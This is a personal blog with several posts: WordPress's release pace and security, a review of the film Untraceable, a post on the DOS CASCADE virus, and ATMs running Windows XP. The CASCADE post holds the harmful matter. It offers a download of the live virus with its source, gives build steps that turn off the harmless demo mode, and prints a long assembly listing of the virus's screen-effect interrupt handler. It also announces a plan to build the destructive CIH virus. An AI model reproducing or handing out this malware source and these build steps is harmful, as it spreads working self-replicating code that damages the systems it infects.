WordPress is churning out new versions faster than my C2Duo / Vista machine can boot Don’t believe me? Look at these dates:

As you can see lately there is a new release every 3 months (avg). As a developer, I understand it is always good to code that great/mean feature and ship it out ASAP so that we can watch the customer use it, but as an end-user it *is* very tiresome to constantly keep upgrading every quarter. I don’t know how many times I did that…I am running more than 2 installations (1 for me, 1 for my wife, blah blah…don’t ask me to use WPMU..I did try it!), so whenever I see “A new WordPress version is available” message, I more or less go nuts!

The basic WP architecture has been severely criticized for being too rigid in terms of quick security fixes. See the following excerpt from Wikipedia:

BlogSecurity currently maintains a list of WordPress vulnerabilities.^[8]

In January 2007, many high-profile Search engine optimization (SEO) blogs, as well as many low-profile commercial blogs featuring AdSense, were targeted and attacked with a WordPress exploit.^[9]

A separate vulnerability on one of the project site’s web servers allowed an attacker to introduce exploitable code in the form of a back door to some downloads of WordPress 2.1.1. The 2.1.2 release addressed this issue; an advisory released at the time advised all users to upgrade immediately.^[10]

In May 2007, a study revealed that 98% of WordPress blogs being run are exploitable.^[11]

In a June 2007 interview, Stefen Esser, the founder of the PHP Security Response Team, spoke critically of WordPress’s security track record, citing problems with the application’s architecture that make it unnecessarily difficult to write code that is secure from SQL injection vulnerabilities, as well as other problems.^[12]

98% of the blogs?? Woah….

I hope WordPress core developers fix the basic design flaw (if there was one!) and put together a solid core to the extremely usable exterior, so that many users like me, who are kind of paranoid, stay with WP in the future! Oh, btw, it’d be really nice if they could make the release cycle twice an year!!

In this post, I want to talk about the movie Untraceable. I just finished watching it. My initial impression – "Great, that was interesting!". But now, after some 10 minutes, I realize all the holes and stupidity in that movie. But before I get to that, let me tell you what this movie is about.

******** Warning: Spoilers ahead ***********

Diane Lane plays the role of a computer specialist in FBI cyber crime division. One day she stumbles upon (no, not using StumbleUpon!) an underground sicko site, where somebody live-streams a cat die. That "somebody" doesn’t stop with the cat (obviously…else we won’t have this movie), he moves on to streaming humans die. The crooked but brilliant mind of the killer comes up with contraptions that are linked to the number of people watching the deaths online; More the people login to watch, faster those devices work to kill their subjects. Does the term contraption remind you of SAW?? It did for me. Coming back to the plot: Lane, along with her colleague, starts investigating and soon they both get in to trouble. Her colleague gets killed next — live-streamed, with millions watching. Now comes the big climax, where Lane figures it out all and exposes the criminal, but gets in to his trap herself. Does she fight it out and comes out alive? Of course, she does. What else can we expect from movies! There you go, the complete plot of Untraceable.

No doubt I enjoyed this movie. I started watching this movie with out knowing anything about the story/plot, didn’t even know what it was about. The moment I saw Diane Lane go in to the computer room and start talking about trojans, I got hooked Personally I love these stuff, but I am sure any computer professional would have felt the same. I also loved the technical talk that happened at the beginning of the movie – at least it made sense. But, when Diane Lane told her superior how the killer had "set up a botnet and keeps a mirror of the site in each compromised system and thats why the site keeps popping up again and again even after her repeated tries to shut it down", I was like "Hold on! Hold on! Is it technically possible? Lemme think…he is streaming a real live video, encoded and being distributed online, from a Russian server…AND what is this mirroring thing and botnet thing she is mixing up? AND what about the DNS refresh latency? And what about the live HD quality video…". Before my slow brain cogs could move, latch and find an answer, the next scene started and I forgot the question itself . Do you see what happened? The movie, to its credit, is not slow anywhere. So it keeps throwing all these technical jargon around, but zips on to the next scene so fast, people don’t get time to think about the technical feasibility at all. This is good tactics and has worked perfectly well for this movie. As I said earlier, I didn’t start thinking about the logic holes and the stupid scenes until the movie ended.

Now for some real bloopers:

• TTL being low. What the hell is Diane Lane talking about? Unless I have forgotten my TCP/IP basics, TTL is just a measure to determine when the packets need to be dropped. If you keep a lower value for it, like 1, the packet will be discarded in the next hop. Lower value doesn’t mean it travels faster, as shown in the movie.
• Botnet thing. Though the idea seems logical, I doubt its feasibility. Botnets are a bunch of compromised machines with agents running in each. You can use them to organize an attack (DoS) on a site or something, but streaming LIVE video is kind of far fetched, if not impossible (as far as my limited knowledge goes). You need to have a super-duper trojan developed for creating such a smart zombie network. The botnet should be kind of fault-tolerant, in the sense there has to be a real time way of a zombie picking up from another dead zombie. I probably have to think about this,  but the idea is good. Even then, a simple analysis of a compromised machine will tell you where the video is coming from, since it is a live feed. This botnet should not make the feed source totally untraceable, as shown in the movie.
• Cool server run off the basement. It is shown to take a load of nearly 17 million people at one point of time, watching the live video stream. Man…that must be one hell of a server, with an amazing pipe.
• Russian servers. The servers are supposed to be in Russia. FBI has no jurisdiction, ok…understandable, but can’t they talk to the Russian counterparts to find the server and shut it down? Or FBI thought Russia wouldn’t be interested in a bunch of Americans being killed live over a site?
• The killer pawns the car. I have never seen a car hacked like this before. The killer shuts down the car computer mid-way and Diane Lane’s car stops. STOPS! How can a car stop just because the on-board computer stopped? And, I seriously doubt the technical possibility of doing this car computer hack — unless you have access to the car’s CAN backbone and have the proprietary (I guess) interface software available on hand, it is next to impossible. At least, if the killer is shown to have used an electro magnetic pulse to disrupt the car electronics, it would have been somewhat believable.
• Diane Lane must be deaf. The killer is shown to be in the back seat, but still Diane Lane couldn’t hear him talk to her over the on-board speaker phone. Duh!
• Lane falls in the trap. If I were Diane Lane I would NEVER have come back in to a car that just got hacked by one of the most elite hackers around. What made her come back to the car, neatly close the door and all, when she just escaped out of it in the previous scene?
• Villain gets beaten by the leading actor. In the climax, Diane Lane is hanging from a rope upside down, with her hands tied, her mouth gagged. The killer keeps a gardening device under her. Computer is connected to the pulley so that as more people login, Lane is released to fall on that device and be shredded in to pieces. Not a bad trick, right? The execution (no pun intended) of this scene is laughable. You need to watch this scene to see how stupid it looked. Why didn’t she remove the gag from her mouth? It is not like her hands were tied behind or something. Man, I didn’t understand that at all. And, this is a big **AND**, why the hell did the killer keep her near a poll when she had this much mobility? The killer was shown a 1337 hax0r through out the movie, but this one scene blew that cool image.
• Diane Lane flashing her badge. After getting free and killing the killer, why did the movie end with Diane Lane showing her badge on the camera?? Was she afraid the people who were logged in would take her to be a killer rather than a licensed-killer (read, COP)?? If I were her, I would have got all the IPs that have logged on to the site, from his computer. Or at least, tell something like "You sickos…watching snuff films is bad for health!" to the camera so that all the people who were watching heard her. None of that, she flashes her badge as if she just won it beating the killer in a WWE match…*sigh*

Another interesting thing I noticed is, through out the movie you never see Linux (or some form of Unix). The FBI computer specialist uses…can you guess?….Windows VISTA. And the elite hacker uses……I bet you won’t get this!………Windows XP Oh man…haven’t you guys ever used Linux before? I shudder to think how ELITEEEEE the killer would have been if only he had used Linux!

Hey…its been ages since I wrote a movie review. Its actually good that I wrote this post immediately after watching the movie, when the movie is fresh in my mind and I have the enthusiasm to finish up this post I know how many posts I missed when I decided to write up something first thing in the morning! Laziness is a big killer, I tell you…

BTW, if my review got you interested in the movie, you can watch it online below Do let me know what you think of this movie.

Online Videos by Veoh.com

Gokul, (owner of Port Bit Systems/Trichy, who was my first computer teacher) looked like a hero to me, when he could magically clean the infection by running a command line DOS McAfee. Man,those days were cool! Later when I started learning x86 assembly and DOS internals, I got fully absorbed in to the wonder world of DOS virii. (I still have the first DOS anti-virus program I wrote – “(C) Brain” remover – somewhere in my old HDD). “Computer Viruses: Prevention, detection and cure” by Rajneesh Kapur was my first viruses book; An excellent one! This is out of print now, can’t even find it in the original publishers site.

One virus I fondly remember to this day, is the famous (!?) CASCADE virus (a.k.a Raindrop/17xx). This virus was a non-overwriting, resident COM infector. When triggered it made the characters in the screen fall in to a nice heap at the bottom. (Remember, we were in the command line mode then!). It was kind of cool to see this cascading action.

Cascade was the first virus to use encryption. The virus consisted of two parts – the virus body and an encryption routine. The latter encrypted the body of the virus so that it appeared different in every infected file. After loading the file, control was transferred to the decryption routine which decoded the virus body and transferred control to it. Unlike future polymorphic viruses, Cascade encoded only the body of the virus. The size of the infected file was used as the decryption key. Since the decryption routine remained unchanged, antivirus programs detected the virus with ease.

If you have never seen the virus in action, look at the screen shots below:

I took the above screen shots from an infected machine I setup. Last week, because of some re-orgs in my group (more about this in a later post!), I had enough time to install DOS in a VM & infect it with CASCADE. It actually felt good to use MASM after a long time, to produce the live virus. Triggering the virus (setting the date to 11-30-1988) was a simple thing. If you think all of this is too much work, download the virtual HD from here. (TODO [Mar24,2008]: Link is not up yet. I will upload the VDI somewhere online and update this post. Please do let me know if you know of any reliable online file storing sites. TIA.). BTW, I used the open source VirtualBox for creating the testbed.

Alternatively, download the floppy disk image from here:

It has the floppy img. with live virus & source. You can burn this to a 1.44MB floppy disk (or use a IMG-aware program to open it) after unzipping.

What is in the disk?

I have included the following:

• cascade.asm
  • The source code of the actual virus. This is the cleaned up version that I used for building the virus.
• cascade.com
  • Live virus. Do not execute this in an unprotected system, if you don’t know what you are doing. Be careful.
    
• makehlv.bat
  • Cleaned up (for masm/x2b) make BAT file. Execute this from the prompt to build the virus.
• readme.txt
  • Contains a description of file and SW requirements.

How to build the virus?

I used MASM 6.11d (16bit assembler) along with X2B (EXE -> COM Converter) for building the virus. You also need DOS debug executable for patching up the initial jump (automatically done by makehlv.bat). If you are using exe2bin, you have to modify makehlv.bat accordingly.

Once you have the environment setup, follow these steps:

1. Open cascade.asm. Find “DEMO EQU FALSE” (It should be near line number 13). If you make this “DEMO EQU TRUE”, virus will not exhibit any harmful things. For our purpose, leave it at “DEMO EQU FALSE”.
2. Add “_DANGER EQU TRUE” after this line.
3. Now, execute the following command from the command line to build the virus: makehlv cascade

Virus in action:

Video is always better than a static picture. Don’t you agree? Look at the following video I captured:

I also found another excellent video:

Virus Code:

The actual cascading is implemented in the following INT 1C handler. The function Random is called for obtaining a random screen row and a column. If the character there is not SPACE, it is moved accordingly downwards. Speaker is toggled, which you won’t get to to know if you run this in a VM. The code is pretty self explanatory.

You can get the complete source code here:

XI_048       LABEL   NEAR
XR_009      EQU     XI_048 + PSPsize
 	TEST    CS:[ISR_Flags],MASK R_in_1c OR MASK ExtCom
 	JZ      XI_049
 	JMP     XI_067
XI_049:      OR      CS:[ISR_Flags],MASK R_in_1c
 	DEC     CS:[XR_002]
 	JZ      XI_050
 	JMP     XI_066
XI_050:     SAVE    DS,ES
 	MOV_S   DS,CS
 	MOV_S   ES,CS
 	SAVE    AX,BX,CX,DX,SI,DI,BP
 	MOV     AL,EOI_8259A
 	OUT     PORT_B_8259A,AL
 	MOV     AX,[XR_003]
 	CMP     AX,0438
 	JNB     XI_051
 	MOV     AX,0438
XI_051:     CALL    Random
 	INC     AX
 	MOV     [XR_002],AX
 	MOV     [XR_003],AX
 	PUSH    DS
 	MOV     AX,BIOSDATASEG
 	MOV     DS,AX
 	MOV     AX,[B_VidPage]
 	POP     DS
 	MOV     [Page_offset],AX
 	MOV     [Last_Line],18
 	MOV     DL,-1
 	MOV     AX,1130
 	MOV     BH,0
 	SAVE    ES,BP
 	INT     10
 	REST    BP,E
 	CMP     DL,-1
 	JZ      XI_052
 	MOV     [Last_Line],DL
XI_052:         CALL    GetSysSpeed
 	MOV     AH,0F
 	INT     10
 	MOV     [Num_of_Col],AH
 	MOV     [Prevent_Snow?],0
 	MOV     [Seg_of_VRAM],MonoBase
 	CMP     AL,07
 	JZ      XI_054
 	JB      XI_053
 	JMP     XI_064
XI_053:         MOV     [Seg_of_VRAM],ColorBase
 	CMP     AL,03
 	JA      XI_054
 	CMP     AL,02
 	JB      XI_054
 	MOV     [Prevent_Snow?],01
 	MOV     AL,[Last_Line]
 	INC     AL
 	MUL     [Num_of_Col]
 	MOV     [Num_of_char],AX
 	MOV     AX,[XR_004]
 	CMP     AX,[Num_of_char]
 	JBE     XI_054
 	MOV     AX,[Num_of_char]
XI_054:         CALL    Random
 	INC     AX
 	MOV     SI,AX
XI_055:         XOR     DI,DI
XI_056:         INC     DI
 	MOV     AX,[Num_of_char]
 	SHL     AX,1
 	CMP     DI,AX
 	JBE     XI_057
 	JMP     XI_064
XI_057:         OR      [ISR_Flags],MASK Recf_1
 	MOV     AL,[Num_of_Col]
 	MOV     AH,0
 	CALL    Random
 	MOV     DL,AL
 	MOV     AL,[Last_Line]
 	MOV     AH,0
 	CALL    Random
 	MOV     DH,AL
 	CALL    Load_from_VRAM
 	CALL    Is_it_blank_?
 	JB      XI_056
 	CALL    Spec_Graphik?
 	JB      XI_056
 	MOV     [Last_Pair],AX
 	MOV     CL,[Last_Line]
 	MOV     CH,0
XI_058:         INC     DH
 	CMP     DH,[Last_Line]
 	JA      XI_062
 	CALL    Load_from_VRAM
 	CMP     AH,[Last_Attr]
 	JNZ     XI_062
 	CALL    Is_it_blank_?
 	JB      XI_060
XI_059:         CALL    Spec_Graphik?
 	JB      XI_062
 	INC     DH
 	CMP     DH,[Last_Line]
 	JA      XI_062
 	CALL    Load_from_VRAM
 	CMP     AH,[Last_Attr]
 	JNZ     XI_062
 	CALL    Is_it_blank_?
 	JNB     XI_059
 	CALL    Toggle_Speaker
 	DEC     DH
 	CALL    Load_from_VRAM
 	MOV     [Last_Char],AL
 	INC     DH
XI_060:         AND     [ISR_Flags],NOT MASK Recf_1
 	DEC     DH
 	MOV     AL,' '
 	CALL    Write_to_VRAM
 	INC     DH
 	MOV     AL,[Last_Char]
 	CALL    Write_to_VRAM
 	JCXZ    XI_061
 	CALL    Delay
 	DEC     CX
XI_061:         JMP     XI_058
XI_062:         TEST    [ISR_Flags],MASK Recf_1
 	JZ      XI_063
 	JMP     XI_056
XI_063:         CALL    Toggle_Speaker
 	DEC     SI
 	JZ      XI_064
 	JMP     XI_055
XI_064:         IN      AL,PORT_B_8255
 	AND     AL,0FC
 	OUT     PORT_B_8255,AL
 	MOV     AX,3
 	CALL    Random
 	INC     AX
 	MUL     [XR_004]
 	JNB     XI_065
 	MOV     AX,-1
XI_065:         MOV     [XR_004],AX
 	REST    BP,DI,SI,DX,CX,BX,AX,ES,DS
XI_066:         AND     CS:[ISR_Flags],NOT MASK R_in_1c
XI_067:         JMP     DWORD PTR CS:[Org_Int_1C]

My next target is to try a destructive virus like CIH. I will let you know what happens. Till then enjoy the mesmerizing cascade effect

[Updated: May 16, 2010 - Fixed the download link]

Who is going to reset the ATM when Windows crashes?

Above is an ATM of the famous VTB bank of Russia, powered by an unactivated copy of Windows XP. Look at a closeup of the activation dialog box below.

I wonder why ATMs don’t have their own OSs! When we talk so much about security / WORMS & malware stuff, does it make sense to use a general purpose OS for something so critical as an ATM? Even a cellphone costing a mere INR 4000 has so any OS flavors to choose from, why is the ATM you withdraw that INR 4000 from is stuck with a most-often-unpatched version of Windows? As Obelix would have said – “These ATM makers are crazy!!”

Check out these interesting links related to Windows Crashes:

• Windows crashes on Flight information screens and ATMs
• ATM crash here and here
• Slot machines too…
• Gallery full of Windows crashes on ATMs/slot machines
• Oh no! Even trains are not spared & other Public computer errors